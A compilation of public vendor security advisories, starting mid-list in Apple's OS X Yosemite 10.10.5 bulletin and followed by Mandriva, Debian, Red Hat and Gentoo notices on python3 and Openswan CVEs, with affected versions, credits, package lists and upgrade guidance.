arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-3804 : Apple CVE-2015-5775 : Apple FontParser Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team groff Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Multiple issues in pdfroff Description: Multiple issues existed in pdfroff, the most serious of which may allow arbitrary filesystem modification. These issues were addressed by removing pdfroff. CVE-ID CVE-2009-5044 CVE-2009-5078 ImageIO Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of TIFF images. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-5758 : Apple ImageIO Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Visiting a maliciously crafted website may result in the disclosure of process memory Description: An uninitialized memory access issue existed in ImageIO's handling of PNG and TIFF images. Visiting a malicious website may result in sending data from process memory to the website. This issue is addressed through improved memory initialization and additional validation of PNG and TIFF images. CVE-ID CVE-2015-5781 : Michal Zalewski CVE-2015-5782 : Michal Zalewski Install Framework Legacy Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to execute arbitrary code with root privileges Description: An issue existed in how Install.framework's 'runner' binary dropped privileges. This issue was addressed through improved privilege management. CVE-ID CVE-2015-5784 : Ian Beer of Google Project Zero Install Framework Legacy Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A race condition existed in Install.framework's 'runner' binary that resulted in privileges being incorrectly dropped. This issue was addressed through improved object locking. CVE-ID CVE-2015-5754 : Ian Beer of Google Project Zero IOFireWireFamily Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute arbitrary code with system privileges Description: Memory corruption issues existed in IOFireWireFamily. These issues were addressed through additional type input validation. CVE-ID CVE-2015-3769 : Ilja van Sprundel CVE-2015-3771 : Ilja van Sprundel CVE-2015-3772 : Ilja van Sprundel IOGraphics Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in IOGraphics. This issue was addressed through additional type input validation. CVE-ID CVE-2015-3770 : Ilja van Sprundel CVE-2015-5783 : Ilja van Sprundel IOHIDFamily Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute arbitrary code with system privileges Description: A buffer overflow issue existed in IOHIDFamily. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5774 : TaiG Jailbreak Team Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in the mach_port_space_info interface, which could have led to the disclosure of kernel memory layout. This was addressed by disabling the mach_port_space_info interface. CVE-ID CVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team, @PanguTeam Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An integer overflow existed in the handling of IOKit functions. This issue was addressed through improved validation of IOKit API arguments. CVE-ID CVE-2015-3768 : Ilja van Sprundel Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to cause a system denial of service Description: A resource exhaustion issue existed in the fasttrap driver. This was addressed through improved memory handling. CVE-ID CVE-2015-5747 : Maxime VILLARD of m00nbsd Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to cause a system denial of service Description: A validation issue existed in the mounting of HFS volumes. This was addressed by adding additional checks. CVE-ID CVE-2015-5748 : Maxime VILLARD of m00nbsd Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to execute unsigned code Description: An issue existed that allowed unsigned code to be appended to signed code in a specially crafted executable file. This issue was addressed through improved code signature validation. CVE-ID CVE-2015-3806 : TaiG Jailbreak Team Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A specially crafted executable file could allow unsigned, malicious code to execute Description: An issue existed in the way multi-architecture executable files were evaluated that could have allowed unsigned code to be executed. This issue was addressed through improved validation of executable files. CVE-ID CVE-2015-3803 : TaiG Jailbreak Team Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute unsigned code Description: A validation issue existed in the handling of Mach-O files. This was addressed by adding additional checks. CVE-ID CVE-2015-3802 : TaiG Jailbreak Team CVE-2015-3805 : TaiG Jailbreak Team Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted plist may lead to an unexpected application termination or arbitrary code execution with system privileges Description: A memory corruption existed in processing of malformed plists. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein (@jollyjinx) of Jinx Germany Kernel Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute arbitrary code with system privileges Description: A path validation issue existed. This was addressed through improved environment sanitization. CVE-ID CVE-2015-3761 : Apple Libc Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted regular expression may lead to an unexpected application termination or arbitrary code execution Description: Memory corruption issues existed in the TRE library. These were addressed through improved memory handling. CVE-ID CVE-2015-3796 : Ian Beer of Google Project Zero CVE-2015-3797 : Ian Beer of Google Project Zero CVE-2015-3798 : Ian Beer of Google Project Zero Libinfo Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: Memory corruption issues existed in handling AF_INET6 sockets. These were addressed by improved memory handling. CVE-ID CVE-2015-5776 : Apple libpthread Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in handling syscalls. This issue was addressed through improved lock state checking. CVE-ID CVE-2015-5757 : Lufeng Li of Qihoo 360 libxml2 Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities existed in libxml2 versions prior to 2.9.2, the most serious of which may allow a remote attacker to cause a denial of service Description: Multiple vulnerabilities existed in libxml2 versions prior to 2.9.2. These were addressed by updating libxml2 to version 2.9.2. CVE-ID CVE-2012-6685 : Felix Groebert of Google CVE-2014-0191 : Felix Groebert of Google libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted XML document may lead to disclosure of user information Description: A memory access issue existed in libxml2. This was addressed by improved memory handling CVE-ID CVE-2014-3660 : Felix Groebert of Google libxml2 Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted XML document may lead to disclosure of user information Description: A memory corruption issue existed in parsing of XML files. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3807 : Apple libxpc Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in handling of malformed XPC messages. This issue was improved through improved bounds checking. CVE-ID CVE-2015-3795 : Mathew Rowley mail_cmds Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute arbitrary shell commands Description: A validation issue existed in the mailx parsing of email addresses. This was addressed by improved sanitization. CVE-ID CVE-2014-7844 Notification Center OSX Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A malicious application may be able to access all notifications previously displayed to users Description: An issue existed in Notification Center, which did not properly delete user notifications. This issue was addressed by correctly deleting notifications dismissed by users. CVE-ID CVE-2015-3764 : Jonathan Zdziarski ntfs Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A local user may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in NTFS. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze Networks OpenSSH Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Remote attackers may be able to circumvent a time delay for failed login attempts and conduct brute-force attacks Description: An issue existed when processing keyboard-interactive devices. This issue was addressed through improved authentication request validation. CVE-ID CVE-2015-5600 OpenSSL Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities existed in OpenSSL versions prior to 0.9.8zg, the most serious of which may allow a remote attacker to cause a denial of service. Description: Multiple vulnerabilities existed in OpenSSL versions prior to 0.9.8zg. These were addressed by updating OpenSSL to version 0.9.8zg. CVE-ID CVE-2015-1788 CVE-2015-1789 CVE-2015-1790 CVE-2015-1791 CVE-2015-1792 perl Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted regular expression may lead to disclosure of unexpected application termination or arbitrary code execution Description: An integer underflow issue existed in the way Perl parsed regular expressions. This issue was addressed through improved memory handling. CVE-ID CVE-2013-7422 PostgreSQL Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: An attacker may be able to cause unexpected application termination or gain access to data without proper authentication Description: Multiple issues existed in PostgreSQL 9.2.4. These issues were addressed by updating PostgreSQL to 9.2.13. CVE-ID CVE-2014-0067 CVE-2014-8161 CVE-2015-0241 CVE-2015-0242 CVE-2015-0243 CVE-2015-0244 python Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities existed in Python 2.7.6, the most serious of which may lead to arbitrary code execution Description: Multiple vulnerabilities existed in Python versions prior to 2.7.6. These were addressed by updating Python to version 2.7.10. CVE-ID CVE-2013-7040 CVE-2013-7338 CVE-2014-1912 CVE-2014-7185 CVE-2014-9365 QL Office Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted Office document may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in parsing of Office documents. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5773 : Apple QL Office Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted XML file may lead to disclosure of user information Description: An external entity reference issue existed in XML file parsing. This issue was addressed through improved parsing. CVE-ID CVE-2015-3784 : Bruno Morisson of INTEGRITY S.A. Quartz Composer Framework Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted QuickTime file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in parsing of QuickTime files. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5771 : Apple Quick Look Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Searching for a previously viewed website may launch the web browser and render that website Description: An issue existed where QuickLook had the capability to execute JavaScript. The issue was addressed by disallowing execution of JavaScript. CVE-ID CVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole QuickTime 7 Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in QuickTime. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3772 CVE-2015-3779 CVE-2015-5753 : Apple CVE-2015-5779 : Apple QuickTime 7 Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in QuickTime. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3765 : Joe Burnett of Audio Poison CVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos CVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos CVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos CVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos CVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos CVE-2015-5751 : WalkerFuz SceneKit Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Viewing a maliciously crafted Collada file may lead to arbitrary code execution Description: A heap buffer overflow existed in SceneKit's handling of Collada files. This issue was addressed through improved input validation. CVE-ID CVE-2015-5772 : Apple SceneKit Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.4 Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in SceneKit. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3783 : Haris Andrianakis of Google Security Team Security Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A standard user may be able to gain access to admin privileges without proper authentication Description: An issue existed in handling of user authentication. This issue was addressed through improved authentication checks. CVE-ID CVE-2015-3775 : [Eldon Ahrold] SMBClient Available for: OS X Yosemite v10.10 to v10.10.4 Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the SMB client. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3773 : Ilja van Sprundel Speech UI Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted unicode string with speech alerts enabled may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in handling of Unicode strings. This issue was addressed by improved memory handling. CVE-ID CVE-2015-3794 : Adam Greenbaum of Refinitive sudo Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities existed in sudo versions prior to 1.7.10p9, the most serious of which may allow an attacker access to arbitrary files Description: Multiple vulnerabilities existed in sudo versions prior to 1.7.10p9. These were addressed by updating sudo to version 1.7.10p9. CVE-ID CVE-2013-1775 CVE-2013-1776 CVE-2013-2776 CVE-2013-2777 CVE-2014-0106 CVE-2014-9680 tcpdump Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most serious of which may allow a remote attacker to cause a denial of service. Description: Multiple vulnerabilities existed in tcpdump versions prior to 4.7.3. These were addressed by updating tcpdump to version 4.7.3. CVE-ID CVE-2014-8767 CVE-2014-8769 CVE-2014-9140 Text Formats Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Parsing a maliciously crafted text file may lead to disclosure of user information Description: An XML external entity reference issue existed with TextEdit parsing. This issue was addressed through improved parsing. CVE-ID CVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team udf Available for: OS X Yosemite v10.10 to v10.10.4 Impact: Processing a maliciously crafted DMG file may lead to an unexpected application termination or arbitrary code execution with system privileges Description: A memory corruption issue existed in parsing of malformed DMG images. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3767 : beist of grayhash OS X Yosemite v10.10.5 includes the security content of Safari 8.0.8: https://support.apple.com/en-us/HT205033 OS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIcBAEBCAAGBQJVzM3+AAoJEBcWfLTuOo7tx/YP/RTsUUx0UTk7rXj6AEcHmiR4 Y2xTUOXqRmxhieSbsGK9laKL5++lIzkGh5RC7oYag0+OgWtZz+EU/EtdoEJmGNJ6 +PgoEnizYdKhO1kos1KCHOwG6UFCqoeEm6Icm33nVUqWp7uAmhVRMRxtMJEScLSR 2LpsK0grIhFXtJGqu053TSKSCa1UTab8XWteZTT84uFGMSKbAFONj5CPIrR6+uev QpVTwrnskPDBOXJwGhjypvIBTbt2aa1wjCukOAWFHwf7Pma/QUdhKRkUK4vAb9/k fu2t2fBOvSMguJHRO+340NsQR9LvmdruBeAyNUH64srF1jtbAg0QnvZsPyO5aIyR A8WrzHl3oIc0II0y7VpI+3o0J3Nn03EcBPtIKeoeyznnjNziDm72HPI2d2+5ZSRz xjAd4Nmw+dgGq+UMkusIXgtRK4HcEpwzfImf3zqnKHakSncnFPhGKyNEgn8bK9a7 AeAvSqMXXsJg8weHUF2NLnAn/42k2wIE8d5BOLaIy13xz6MJn7VUI21pK0zCaGBF sfkRFZP0eEVh8ZzU/nWp9E5KDpbsd72biJwvjWH4OrmkfzUWxStQiVwPTxtZD9LW c5ZWe+vqZJV9eYRH2hAOMPaYkOQ5Z4DySNVVOFAG0eq9til8+V0k3L7ipIVd2XUB msu6gVP8uZhFYNb8byVJ =+0e/ -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2015:076 http://www.mandriva.com/en/support/security/ _______________________________________________________________________ Package : python3 Date : March 27, 2015 Affected: Business Server 2.0 _______________________________________________________________________ Problem Description: Updated python3 packages fix security vulnerabilities: ZipExtFile.read goes into 100% CPU infinite loop on maliciously binary edited zips (CVE-2013-7338). A vulnerability was reported in Python&#039;s socket module, due to a boundary error within the sock_recvfrom_into() function, which could be exploited to cause a buffer overflow. This could be used to crash a Python application that uses the socket.recvfrom_info() function or, possibly, execute arbitrary code with the permissions of the user running vulnerable Python code (CVE-2014-1912). It was reported that a patch added to Python 3.2 caused a race condition where a file created could be created with world read/write permissions instead of the permissions dictated by the original umask of the process. This could allow a local attacker that could win the race to view and edit files created by a program using this call. Note that prior versions of Python, including 2.x, do not include the vulnerable _get_masked_mode() function that is used by os.makedirs() when exist_ok is set to True (CVE-2014-2667). Python are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking. The bug is caused by allowing the user to supply a negative value that is used an an array index, causing the scanstring function to access process memory outside of the string it is intended to access (CVE-2014-4616). The CGIHTTPServer Python module does not properly handle URL-encoded path separators in URLs. This may enable attackers to disclose a CGI script&#039;s source code or execute arbitrary scripts in the server&#039;s document root (CVE-2014-4650). _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7338 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1912 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2667 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4616 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650 http://advisories.mageia.org/MGASA-2014-0085.html http://advisories.mageia.org/MGASA-2014-0140.html http://advisories.mageia.org/MGASA-2014-0216.html http://advisories.mageia.org/MGASA-2014-0285.html _______________________________________________________________________ Updated Packages: Mandriva Business Server 2/X86_64: 56f95c3e025bb7111ee5c54dfa85f383 mbs2/x86_64/lib64python3.3-3.3.2-14.1.mbs2.x86_64.rpm cff088862bad2bccba25080f5123c308 mbs2/x86_64/lib64python3-devel-3.3.2-14.1.mbs2.x86_64.rpm bee9faadbee55220b5be84138d183943 mbs2/x86_64/python3-3.3.2-14.1.mbs2.x86_64.rpm 763832c9969a3b6b6f7d4afefe3d8abd mbs2/x86_64/python3-docs-3.3.2-14.1.mbs2.noarch.rpm c25f48cc46129556b7618bebe4b0d1f0 mbs2/x86_64/tkinter3-3.3.2-14.1.mbs2.x86_64.rpm 482e45791ec634dda30134cd5513fccc mbs2/x86_64/tkinter3-apps-3.3.2-14.1.mbs2.x86_64.rpm 08451430f2a306c8f64ba1e6828a93dd mbs2/SRPMS/python3-3.3.2-14.1.mbs2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security

Openswan 2.6.39 and earlier allows remote attackers to cause a denial of service (NULL pointer dereference and IKE daemon restart) via IKEv2 packets that lack expected payloads. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. Openswan is a VPN implemented using ipsec technology. Openswan is prone to a remote denial-of-service vulnerability. An attacker may exploit this issue to restart the application, resulting in a denial-of-service condition to legitimate users. Openswan 2.6.39 and prior are vulnerable. CVE-2013-2053 During an audit of Libreswan (with which Openswan shares some code), Florian Weimer found a remote buffer overflow in the atodn() function. This vulnerability can be triggered when Opportunistic Encryption (OE) is enabled and an attacker controls the PTR record of a peer IP address. Authentication is not needed to trigger the vulnerability. CVE-2013-6466 Iustina Melinte found a vulnerability in Libreswan which also applies to the Openswan code. By carefuly crafting IKEv2 packets, an attacker can make the pluto daemon derefeences non-received IKEv2 payload, leading to the daemon crash. Authentication is not needed to trigger the vulnerability. Patches were originally written to fix the vulnerabilities in Libreswan, and have been ported to Openswan by Paul Wouters from the Libreswan Project. Since the Openswan package is not maintained anymore in the Debian distribution and is not available in testing and unstable suites, it is recommended for IKE/IPsec users to switch to a supported implementation like strongSwan. For the oldstable distribution (squeeze), these problems have been fixed in version 2.6.28+dfsg-5+squeeze2. For the stable distribution (wheezy), these problems have been fixed in version 2.6.37-3.1. We recommend that you upgrade your openswan packages. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: openswan security update Advisory ID: RHSA-2014:0185-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0185.html Issue date: 2014-02-18 CVE Names: CVE-2013-6466 ===================================================================== 1. Summary: Updated openswan packages that fix one security issue are now available for Red Hat Enterprise Linux 5 and 6. The Red Hat Security Response Team has rated this update as having Moderate security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64 Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 3. Description: Openswan is a free implementation of Internet Protocol Security (IPsec) and Internet Key Exchange (IKE). IPsec uses strong cryptography to provide both authentication and encryption services. These services allow you to build secure tunnels through untrusted networks. (CVE-2013-6466) All openswan users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1050277 - CVE-2013-6466 openswan: dereferencing missing IKEv2 payloads causes pluto daemon to restart 6. Package List: Red Hat Enterprise Linux Desktop (v. 5 client): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/openswan-2.6.32-7.3.el5_10.src.rpm i386: openswan-2.6.32-7.3.el5_10.i386.rpm openswan-debuginfo-2.6.32-7.3.el5_10.i386.rpm openswan-doc-2.6.32-7.3.el5_10.i386.rpm x86_64: openswan-2.6.32-7.3.el5_10.x86_64.rpm openswan-debuginfo-2.6.32-7.3.el5_10.x86_64.rpm openswan-doc-2.6.32-7.3.el5_10.x86_64.rpm Red Hat Enterprise Linux (v. 5 server): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/openswan-2.6.32-7.3.el5_10.src.rpm i386: openswan-2.6.32-7.3.el5_10.i386.rpm openswan-debuginfo-2.6.32-7.3.el5_10.i386.rpm openswan-doc-2.6.32-7.3.el5_10.i386.rpm ia64: openswan-2.6.32-7.3.el5_10.ia64.rpm openswan-debuginfo-2.6.32-7.3.el5_10.ia64.rpm openswan-doc-2.6.32-7.3.el5_10.ia64.rpm ppc: openswan-2.6.32-7.3.el5_10.ppc.rpm openswan-debuginfo-2.6.32-7.3.el5_10.ppc.rpm openswan-doc-2.6.32-7.3.el5_10.ppc.rpm s390x: openswan-2.6.32-7.3.el5_10.s390x.rpm openswan-debuginfo-2.6.32-7.3.el5_10.s390x.rpm openswan-doc-2.6.32-7.3.el5_10.s390x.rpm x86_64: openswan-2.6.32-7.3.el5_10.x86_64.rpm openswan-debuginfo-2.6.32-7.3.el5_10.x86_64.rpm openswan-doc-2.6.32-7.3.el5_10.x86_64.rpm Red Hat Enterprise Linux Desktop (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openswan-2.6.32-27.2.el6_5.src.rpm i386: openswan-2.6.32-27.2.el6_5.i686.rpm openswan-debuginfo-2.6.32-27.2.el6_5.i686.rpm x86_64: openswan-2.6.32-27.2.el6_5.x86_64.rpm openswan-debuginfo-2.6.32-27.2.el6_5.x86_64.rpm Red Hat Enterprise Linux Desktop Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openswan-2.6.32-27.2.el6_5.src.rpm i386: openswan-debuginfo-2.6.32-27.2.el6_5.i686.rpm openswan-doc-2.6.32-27.2.el6_5.i686.rpm x86_64: openswan-debuginfo-2.6.32-27.2.el6_5.x86_64.rpm openswan-doc-2.6.32-27.2.el6_5.x86_64.rpm Red Hat Enterprise Linux Server (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openswan-2.6.32-27.2.el6_5.src.rpm i386: openswan-2.6.32-27.2.el6_5.i686.rpm openswan-debuginfo-2.6.32-27.2.el6_5.i686.rpm ppc64: openswan-2.6.32-27.2.el6_5.ppc64.rpm openswan-debuginfo-2.6.32-27.2.el6_5.ppc64.rpm s390x: openswan-2.6.32-27.2.el6_5.s390x.rpm openswan-debuginfo-2.6.32-27.2.el6_5.s390x.rpm x86_64: openswan-2.6.32-27.2.el6_5.x86_64.rpm openswan-debuginfo-2.6.32-27.2.el6_5.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openswan-2.6.32-27.2.el6_5.src.rpm i386: openswan-debuginfo-2.6.32-27.2.el6_5.i686.rpm openswan-doc-2.6.32-27.2.el6_5.i686.rpm ppc64: openswan-debuginfo-2.6.32-27.2.el6_5.ppc64.rpm openswan-doc-2.6.32-27.2.el6_5.ppc64.rpm s390x: openswan-debuginfo-2.6.32-27.2.el6_5.s390x.rpm openswan-doc-2.6.32-27.2.el6_5.s390x.rpm x86_64: openswan-debuginfo-2.6.32-27.2.el6_5.x86_64.rpm openswan-doc-2.6.32-27.2.el6_5.x86_64.rpm Red Hat Enterprise Linux Workstation (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openswan-2.6.32-27.2.el6_5.src.rpm i386: openswan-2.6.32-27.2.el6_5.i686.rpm openswan-debuginfo-2.6.32-27.2.el6_5.i686.rpm x86_64: openswan-2.6.32-27.2.el6_5.x86_64.rpm openswan-debuginfo-2.6.32-27.2.el6_5.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openswan-2.6.32-27.2.el6_5.src.rpm i386: openswan-debuginfo-2.6.32-27.2.el6_5.i686.rpm openswan-doc-2.6.32-27.2.el6_5.i686.rpm x86_64: openswan-debuginfo-2.6.32-27.2.el6_5.x86_64.rpm openswan-doc-2.6.32-27.2.el6_5.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2013-6466.html https://access.redhat.com/security/updates/classification/#moderate 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFTA6D7XlSAg2UNWIIRAkO0AKCCIbfDJPZuuXS7U6rZU8/CimQlxwCeIPUb dpyjtxp6hcgn2NES8FPSOkw= =jFWA -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Background ========== Openswan is an implementation of IPsec for Linux. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/openswan <= 2.6.39-r1 Vulnerable! ------------------------------------------------------------------- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. Impact ====== A remote attacker could create a Denial of Service condition. Workaround ========== There is no known workaround at this time. Resolution ========== Gentoo has discontinued support for Openswan. We recommend that users unmerge Openswan: # emerge --unmerge "net-misc/openswan" NOTE: The Gentoo developer(s) maintaining Openswan have discontinued support at this time. It may be possible that a new Gentoo developer will update Openswan at a later date. Alternatives packages such as Libreswan and strongSwan are currently available in Gentoo Portage. References ========== [ 1 ] CVE-2013-6466 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6466 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201411-07.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

